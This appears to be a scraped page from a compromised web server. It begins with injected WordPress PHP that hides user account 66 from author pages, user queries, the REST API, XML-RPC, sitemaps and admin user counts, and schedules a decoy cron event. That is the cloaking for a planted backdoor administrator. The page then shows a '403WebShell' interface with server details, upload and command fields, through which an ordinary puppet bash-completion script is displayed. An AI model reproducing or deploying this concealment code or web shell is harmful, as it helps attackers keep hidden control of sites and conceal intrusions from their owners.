add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/bash-completion/completions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/bash-completion/completions/puppetrun
# bash completion for puppet                               -*- shell-script -*-

_puppet_logdest()
{
    if [[ -z $cur ]]; then
        COMPREPLY=($(compgen -W 'syslog console /' -- "$cur"))
    else
        COMPREPLY=($(compgen -W 'syslog console' -- "$cur"))
        _filedir
    fi
}

_puppet_digest()
{
    COMPREPLY=($(compgen -W 'MD5 MD2 SHA1 SHA256' -- "$cur"))
}

_puppet_certs()
{
    local puppetca="puppet cert"
    PATH=$PATH:/sbin:/usr/sbin:/usr/local/sbin type puppetca &>/dev/null &&
        puppetca=puppetca

    if [[ $1 == --all ]]; then
        cert_list=$($puppetca --list --all | command sed -e 's/^[+-]\{0,1\}\s*\(\S\+\)\s\+.*$/\1/')
    else
        cert_list=$($puppetca --list)
    fi
    COMPREPLY+=($(compgen -W "$cert_list" -- "$cur"))
}

_puppet_types()
{
    puppet_types=$(puppet describe --list | command sed -e 's/^\(\S\{1,\}\).*$/\1/')
    COMPREPLY+=($(compgen -W "$puppet_types" -- "$cur"))
}

_puppet_references()
{
    local puppetdoc="puppet doc"
    PATH=$PATH:/sbin:/usr/sbin:/usr/local/sbin type puppetdoc &>/dev/null &&
        puppetdoc=puppetdoc

    puppet_doc_list=$($puppetdoc --list | command sed -e 's/^\(\S\{1,\}\).*$/\1/')
    COMPREPLY+=($(compgen -W "$puppet_doc_list" -- "$cur"))
}

_puppet_subcmd_opts()
{
    # puppet cmd help is somewhat slow, avoid if possible
    [[ -z $cur || $cur == -* ]] &&
        COMPREPLY+=($(compgen -W \
            '$(_parse_usage "$1" "help $2")' -- "$cur"))
}

_puppet()
{
    local cur prev words cword
    _init_completion || return

    local subcommand action

    case $prev in
        -h | --help | -V | --version)
            return
            ;;
    esac

    case ${words[0]} in
        puppetmasterd)
            subcommand=master
            ;;
        puppetd)
            subcommand=agent
            ;;
        puppetca)
            subcommand=cert
            ;;
        ralsh)
            subcommand=resource
            ;;
        puppetrun)
            subcommand=kick
            ;;
        puppetqd)
            subcommand=queue
            ;;
        filebucket)
            subcommand=filebucket
            ;;
        puppetdoc)
            subcommand=doc
            ;;
        pi)
            subcommand=describe
            ;;
        puppet)
            case ${words[1]} in
                agent | apply | cert | describe | doc | filebucket | kick | master | parser | queue | resource)
                    subcommand=${words[1]}
                    ;;
                *.pp | *.rb)
                    subcommand=apply
                    ;;
                *)
                    COMPREPLY=($(compgen -W 'agent apply cert describe doc
                        filebucket kick master parser queue resource' \
                        -- "$cur"))
                    return
                    ;;
            esac
            ;;
    esac

    case $subcommand in
        agent)
            case $prev in
                --certname)
                    _known_hosts_real -- "$cur"
                    return
                    ;;
                --digest)
                    _puppet_digest
                    return
                    ;;
                --fqdn)
                    _known_hosts_real -- "$cur"
                    return
                    ;;
                -l | --logdest)
                    _puppet_logdest
                    return
                    ;;
                --masterport)
                    COMPREPLY=($(compgen -W '8140' -- "$cur"))
                    return
                    ;;
                -w | --waitforcert)
                    COMPREPLY=($(compgen -W '0 15 30 60 120' -- "$cur"))
                    return
                    ;;
                *)
                    _puppet_subcmd_opts "$1" $subcommand
                    # _parse_usage doesn't grok [-D|--daemonize|--no-daemonize]
                    COMPREPLY+=($(compgen -W '--no-daemonize' -- "$cur"))
                    return
                    ;;
            esac
            ;;
        apply)
            case $prev in
                --catalog)
                    COMPREPLY=($(compgen -W '-' -- "$cur"))
                    _filedir json
                    return
                    ;;
                --execute)
                    return
                    ;;
                -l | --logdest)
                    _puppet_logdest
                    return
                    ;;
                *)
                    if [[ $cur == -* ]]; then
                        _puppet_subcmd_opts "$1" $subcommand
                    else
                        _filedir
                    fi
                    return
                    ;;
            esac
            ;;
        cert)
            case $prev in
                --digest)
                    _puppet_digest
                    return
                    ;;
                *)
                    action=$prev
                    COMPREPLY=($(compgen -W '--digest --debug --help --verbose --version' \
                        -- "$cur"))
                    case $action in
                        fingerprint | list | verify | --fingerprint | --list | --verify)
                            COMPREPLY+=($(compgen -W '--all' -- "$cur"))
                            _puppet_certs --all
                            return
                            ;;
                        generate | --generate)
                            _known_hosts_real -- "$cur"
                            return
                            ;;
                        clean | print | revoke | --clean | --print | --revoke)
                            _puppet_certs --all
                            return
                            ;;
                        sign | --sign)
                            COMPREPLY+=($(compgen -W '--all' -- "$cur"))
                            _puppet_certs
                            return
                            ;;
                        *)
                            COMPREPLY+=($(compgen -W 'clean fingerprint generate
                                list print revoke sign verify reinventory' -- "$cur"))
                            return
                            ;;
                    esac
                    ;;
            esac
            ;;
        describe)
            _puppet_subcmd_opts "$1" $subcommand
            if [[ $cur != -* ]]; then
                _puppet_types
            fi
            return
            ;;
        doc)
            case $prev in
                -o | --outputdir)
                    _filedir -d
                    return
                    ;;
                -m | --mode)
                    COMPREPLY=($(compgen -W 'text trac pdf rdoc' -- "$cur"))
                    return
                    ;;
                -r | --reference)
                    _puppet_references
                    return
                    ;;
                *)
                    if [[ $cur == -* ]]; then
                        _puppet_subcmd_opts "$1" $subcommand
                    else
                        _filedir
                    fi
                    return
                    ;;
            esac
            ;;
        filebucket)
            case $prev in
                -s | --server)
                    _known_hosts_real -- "$cur"
                    return
                    ;;
                -b | --bucket)
                    _filedir -d
                    return
                    ;;
                *)
                    if [[ $cur == -* ]]; then
                        _puppet_subcmd_opts "$1" $subcommand
                    else
                        COMPREPLY=($(compgen -W 'backup get restore' \
                            -- "$cur"))
                        _filedir
                    fi
                    return
                    ;;
            esac
            ;;
        kick)
            case $prev in
                -c | --class)
                    return
                    ;;
                --host)
                    _known_hosts_real -- "$cur"
                    return
                    ;;
                -t | --tag)
                    return
                    ;;
                *)
                    if [[ $cur == -* ]]; then
                        _puppet_subcmd_opts "$1" $subcommand
                    else
                        _known_hosts_real -- "$cur"
                    fi
                    return
                    ;;
            esac
            ;;
        master)
            case $prev in
                -l | --logdest)
                    _puppet_logdest
                    return
                    ;;
                *)
                    _puppet_subcmd_opts "$1" $subcommand
                    # _parse_usage doesn't grok [-D|--daemonize|--no-daemonize]
                    COMPREPLY+=($(compgen -W '--no-daemonize' -- "$cur"))
                    return
                    ;;
            esac
            ;;
        parser)
            action=$prev
            case $action in
                validate)
                    _filedir pp
                    return
                    ;;
                *)
                    COMPREPLY=($(compgen -W 'validate' -- "$cur"))
                    return
                    ;;
            esac
            ;;
        queue)
            case $prev in
                -l | --logdest)
                    _puppet_logdest
                    return
                    ;;
                *)
                    if [[ $cur == -* ]]; then
                        _puppet_subcmd_opts "$1" $subcommand
                    else
                        _filedir
                    fi
                    return
                    ;;
            esac
            ;;
        resource | *)
            _puppet_subcmd_opts "$1" $subcommand
            return
            ;;
    esac
} &&
    complete -F _puppet puppetmasterd puppetd puppetca ralsh puppetrun puppetqd filebucket puppetdoc puppet

# ex: filetype=sh

Youez - 2016 - github.com/yon3zu
LinuXploit